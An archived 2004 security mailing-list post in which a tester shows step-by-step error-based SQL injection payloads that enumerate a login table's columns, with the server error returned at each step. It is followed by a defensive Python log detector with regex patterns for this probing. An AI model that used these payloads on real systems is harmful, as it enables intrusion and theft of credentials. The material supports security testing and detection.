WebApp Sec mailing list archives

Enumerating databases...


From: KrK <krk41 () yahoo com>
Date: Sun, 19 Sep 2004 11:29:09 -0700 (PDT)

Hi List,

I have been doing testing of a web site and have found all the errors as
detailed in the advanced SQL injection paper by NGSSoftware and in Hacme
Bank.

I have been stuck on the way because of a different error and am unable to
enumerate the database further. Here is the list of tests that I have done
and the corresponding output. If anyone could suggest how to enumerate
the rest of the table fields, it would be great.

step 1: userid='%20having%201%3d1%2d%2d
(encoded form of ' having 1=1--)
result 1:
Column 'logindetls.userid' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

step 2: '%20GROUP%20BY%20logindetls.userid%20having%201=1--
result 2:
Column 'logindetls.password' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.

step 3: userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201=1--
result 3:
Column 'logindetls.name' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.

and so on and so forth until I reach a point where I get this error:

[Microsoft][ODBC SQL Server Driver][SQL Server]:the text, ntext, and image
data types cannot be compared or sorted, except when using IS NULL or LIKE operator

The application, I feel, stores text data in one of the fields, which results
in the generation of this error. Has anyone on the list come across this? Any
clues on how to enumerate the database further?

Thanking you,
Krk


=====
" DON'T WORRY BE HAPPY,
     EVERY NIGHT YOU HAVE SOME TROUBLE,
     IF YOU WORRY YOU MAKE IT DOUBLE,
     SO DON'T WORRY BE HAPPY NOW...."
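
For defenders, the probe sequence in the message above leaves a recognisable trail in request logs: a "having 1=1" predicate whose GROUP BY column list grows by one with each request. The Python sketch below is an added example, not part of the original post; the log line layout (client, method, target, status), the IP addresses and the /login.asp path are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines: "<client> <method> <target> <status>" (assumed layout).
SAMPLE_LOG = [
    "203.0.113.7 GET /login.asp?userid='%20having%201%3d1%2d%2d 500",
    "203.0.113.7 GET /login.asp?userid='%20GROUP%20BY%20logindetls.userid%20having%201=1-- 500",
    "203.0.113.7 GET /login.asp?userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201=1-- 500",
    "198.51.100.4 GET /login.asp?userid=alice 200",
    "198.51.100.9 GET /search.asp?q=having%20fun%20in%20a%20group 200",
]

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")
HAVING_RE = re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I)
GROUP_RE = re.compile(r"\bgroup\s+by\s+([\w.\[\]]+(?:\s*,\s*[\w.\[\]]+)*)", re.I)

def analyze(lines):
    """Return per-client counters for HAVING/GROUP BY probing seen in the log."""
    clients = defaultdict(lambda: {"probes": 0, "max_group_cols": 0,
                                   "errors": 0, "enumerating": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        ip, _method, target, status = m.groups()
        # parse_qsl URL-decodes each parameter value before matching.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if not HAVING_RE.search(value):
                continue
            state = clients[ip]
            state["probes"] += 1
            if status.startswith("5"):
                state["errors"] += 1  # a 5xx reply may carry the verbose DB error
            g = GROUP_RE.search(value)
            cols = len(g.group(1).split(",")) if g else 0
            # A GROUP BY list that grows across probes marks column-by-column enumeration.
            if state["probes"] > 1 and cols > state["max_group_cols"]:
                state["enumerating"] = True
            state["max_group_cols"] = max(state["max_group_cols"], cols)
    return dict(clients)

if __name__ == "__main__":
    for client, state in analyze(SAMPLE_LOG).items():
        print(client, state)
```

A non-zero "errors" count alongside "enumerating" means the application answered the probes with server errors, which is the point at which to check that database error text is not returned to clients and that the parameter is bound through a parameterized query.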


                

